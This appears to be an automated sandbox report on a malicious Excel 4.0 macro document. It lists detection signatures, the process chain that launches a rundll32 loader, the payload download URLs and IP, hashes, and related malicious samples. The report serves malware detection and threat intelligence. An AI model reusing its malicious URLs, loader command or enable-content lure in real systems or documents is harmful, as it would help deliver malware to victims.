Loading ...

Play interactive tourEdit tour

Analysis Report document-1900770373.xls

Overview

General Information

Sample Name:document-1900770373.xls
Analysis ID:355743
MD5:139a10b28479f4f9e2e4465053e039f8
SHA1:10251eb69e603ed7259265015b71b1160e3b4a06
SHA256:ed17094f3e820674c9fa18192292108e8766d28eb0afcc0cf350a44b54196c1d
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2844 cmdline: rundll32 ..\idefje.ekfd,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1900770373.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11c55:$e1: Enable Editing
  • 0x11cca:$e2: Enable Content
document-1900770373.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x13ca2:$s1: Excel
  • 0x14cfd:$s1: Excel
  • 0x36bd:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1900770373.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\idefje.ekfd,DllRegisterServer, CommandLine: rundll32 ..\idefje.ekfd,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1552, ProcessCommandLine: rundll32 ..\idefje.ekfd,DllRegisterServer, ProcessId: 2844

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: https://kashful.softwarebd.biz/ds/1802.gifAvira URL Cloud: Label: malware
    Source: https://kashful.softwarebd.biz/ds/1802.DcAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URLShow sources
    Source: kashful.softwarebd.bizVirustotal: Detection: 6%Perma Link
    Source: https://kashful.softwarebd.biz/ds/1802.gifVirustotal: Detection: 13%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 185.151.30.170:443 -> 192.168.2.22:49165 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: kashful.softwarebd.biz
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.151.30.170:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.151.30.170:443
    Source: Joe Sandbox ViewASN Name: TWENTYIGB TWENTYIGB
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: kashful.softwarebd.biz
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: CD13771E5132C64BEEF257719A4363C40.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
    Source: CD13771E5132C64BEEF257719A4363C4.0.drString found in binary or memory: http://cert.int-x1.letsencrypt.org/
    Source: CD13771E5132C64BEEF257719A4363C40.0.drString found in binary or memory: http://cps.root-x1.letsencrypt.org0
    Source: CD13771E5132C64BEEF257719A4363C40.0.drString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: CD13771E5132C64BEEF257719A4363C40.0.drString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
    Source: rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: document-1900770373.xlsString found in binary or memory: https://kashful.softwarebd.biz/ds/1802.Dc
    Source: document-1900770373.xlsString found in binary or memory: https://kashful.softwarebd.biz/ds/1802.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownHTTPS traffic detected: 185.151.30.170:443 -> 192.168.2.22:49165 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: document-1900770373.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "I
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1900770373.xlsInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: document-1900770373.xlsInitial sample: Sheet size: 4931
    Source: document-1900770373.xlsOLE indicator, VBA macros: true
    Source: document-1900770373.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-1900770373.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal96.expl.evad.winXLS@3/13@3/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CBBE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB4FC.tmpJump to behavior
    Source: document-1900770373.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1900770373.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting31Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting31LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    kashful.softwarebd.biz6%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://kashful.softwarebd.biz/ds/1802.gif13%VirustotalBrowse
    https://kashful.softwarebd.biz/ds/1802.gif100%Avira URL Cloudmalware
    https://kashful.softwarebd.biz/ds/1802.Dc100%Avira URL Cloudmalware
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    kashful.softwarebd.biz
    185.151.30.170
    truetrueunknown
    cert.int-x1.letsencrypt.org
    unknown
    unknownfalse
      high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpfalse
              high
              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2089330403.0000000001DD7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2089178138.0000000001BF0000.00000002.00000001.sdmpfalse
                  high
                  https://kashful.softwarebd.biz/ds/1802.gifdocument-1900770373.xlstrue
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://cert.int-x1.letsencrypt.org/CD13771E5132C64BEEF257719A4363C4.0.drfalse
                    high
                    https://kashful.softwarebd.biz/ds/1802.Dcdocument-1900770373.xlstrue
                    • Avira URL Cloud: malware
                    unknown
                    http://cps.root-x1.letsencrypt.org0CD13771E5132C64BEEF257719A4363C40.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    185.151.30.170
                    unknownUnited Kingdom
                    48254TWENTYIGBtrue

                    General Information

                    Joe Sandbox Version:31.0.0 Emerald
                    Analysis ID:355743
                    Start date:21.02.2021
                    Start time:16:54:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 4m 32s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:document-1900770373.xls
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal96.expl.evad.winXLS@3/13@3/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xls
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Found warning dialog
                    • Click Ok
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 23.50.97.168, 192.35.177.64, 8.248.119.254, 8.248.133.254, 8.248.131.242, 67.26.139.254, 8.253.207.121
                    • Excluded domains from analysis (whitelisted): e8652.dscx.akamaiedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWENTYIGBransomware.exeGet hashmaliciousBrowse
                    • 185.151.30.147
                    61vPFITGkbgCrMT.exeGet hashmaliciousBrowse
                    • 185.151.30.167
                    3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
                    • 185.151.30.167
                    SEA LION LOGISTICS-URGENT QUOTATION.exeGet hashmaliciousBrowse
                    • 185.151.30.167
                    Amazon_eGift-Card.451219634.docGet hashmaliciousBrowse
                    • 185.151.30.145
                    eGift-CardAmazon.907427310.docGet hashmaliciousBrowse
                    • 185.151.30.145
                    Order_Gift_Card_411022863.docGet hashmaliciousBrowse
                    • 185.151.30.145
                    https://warleyroad.calderdale.sch.uk/folded/recovery/index.php?email=w_allender@bmifcu.orgGet hashmaliciousBrowse
                    • 185.151.31.155
                    PO_scan000000100205032.exeGet hashmaliciousBrowse
                    • 185.151.30.148

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bAswpCUetE0.docGet hashmaliciousBrowse
                    • 185.151.30.170
                    EIY2otZ3r8.docGet hashmaliciousBrowse
                    • 185.151.30.170
                    Invoice.pptGet hashmaliciousBrowse
                    • 185.151.30.170
                    Invoice.pptGet hashmaliciousBrowse
                    • 185.151.30.170
                    SecuriteInfo.com.Exploit.Siggen3.10343.28053.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-1625724940.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-354084053.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    SecuriteInfo.com.Exploit.Siggen3.10204.3307.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-1220302043.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-573042818.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-573042818.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-573042818.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    Document27467.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    document-750895311.xlsGet hashmaliciousBrowse
                    • 185.151.30.170
                    MV TEAL BULKERS.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170
                    ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170
                    HBL VRNA00872.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170
                    statement.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170
                    MV SEASPAN EMERALD II.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170
                    _Doc_Shipment_330393_.xlsxGet hashmaliciousBrowse
                    • 185.151.30.170

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                    Category:dropped
                    Size (bytes):59134
                    Entropy (8bit):7.995450161616763
                    Encrypted:true
                    SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                    MD5:E92176B0889CC1BB97114BEB2F3C1728
                    SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                    SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                    SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CD13771E5132C64BEEF257719A4363C4
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1196
                    Entropy (8bit):7.269027716005122
                    Encrypted:false
                    SSDEEP:24:mPvKUJ0k8cUM7APBNRfGnKRvgihtHZib7HbFANMgduqgbzs:+5J0k8cUAACK5xhlZc7HbFANhgqJ
                    MD5:33E25CB51753B4C38817774E38BD2107
                    SHA1:3EAE91937EC85D74483FF4B77B07B43E2AF36BF4
                    SHA-256:7FDCE3BF4103C2684B3ADBB5792884BD45C75094C217788863950346F79C90A3
                    SHA-512:95BED189BF575A88E7935F5967154F74908D3C32662C3F0B66AF8522A6AF22653FD693A39EFE3639F5134466C46A16EBB7E849890FDE84324DE645FFE7E892B1
                    Malicious:false
                    Reputation:low
                    Preview: 0...0..............u..u.C.C...D.0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...151019223336Z..201019223336Z0J1.0...U....US1.0...U....Let's Encrypt1#0!..U....Let's Encrypt Authority X10.."0...*.H.............0............Z..G.r]7..hc0..5&.%.5.p./..KA....5.X.*.h....u...bq.y.`......xgq.i.......`<H.~.Mw.$.G.Z...7....{....J.A.6....m<.h.#*B...tg.....Ra..?e.....V....?.......k...}.+.e...6u.k.J...Ix/..O* %)..t..1.18....3.C...0..y1.=-6....3j.91....d.3...).....}..........0...0...U.......0.......0...U...........0...+........s0q02..+.....0..&http://isrg.trustid.ocsp.identrust.com0;..+.....0../http://apps.identrust.com/roots/dstrootcax3.p7c0...U.#..0......{,q...K.u...`...0T..U. .M0K0...g.....0?..+..........000...+........"http://cps.root-x1.letsencrypt.org0<..U...50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0...U....0...0....mil0...U.......Jjc.}...9..Ee...0...*.H..............."K......P..xp*..X].Bv..rZ.i.w./...N,.b.'.........E......+
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
